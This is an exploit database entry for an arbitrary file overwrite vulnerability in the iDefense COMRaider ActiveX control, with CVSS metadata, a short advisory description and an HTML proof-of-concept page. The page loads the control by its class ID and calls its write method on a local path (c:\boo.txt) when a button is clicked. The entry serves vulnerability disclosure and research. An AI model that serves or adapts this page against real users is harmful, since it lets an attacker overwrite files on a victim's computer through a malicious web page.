vendor: COMRaider ActiveX control
by: SecurityFocus
CVSS: 7.5 HIGH
Arbitrary File Overwrite
CWE: 264
Product Name: COMRaider ActiveX control
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: No
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2008

iDefense COMRaider ActiveX control Arbitrary File Overwrite Vulnerability

iDefense COMRaider ActiveX control is prone to a vulnerability that lets attackers overwrite arbitrary local files on the victim's computer in the context of the vulnerable application using the ActiveX control (typically Internet Explorer). An attacker can exploit this issue by enticing an unsuspecting user to view a malicious web page.

Mitigation:

No known mitigation
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/33942/info

iDefense COMRaider ActiveX control is prone to a vulnerability that lets attackers overwrite arbitrary local files on the victim's computer in the context of the vulnerable application using the ActiveX control (typically Internet Explorer).

<HTML>
<BODY>
<object id=target classid="clsid:{9A077D0D-B4A6-4EC0-B6CF-98526DF589E4}"></object>
<SCRIPT>
function Poc() {
    arg1="c:\boo.txt"
    target.write(arg1)
}
</SCRIPT>
<input language=JavaScript onclick=Poc() type=button value="Proof of Concept">
</BODY>
</HTML>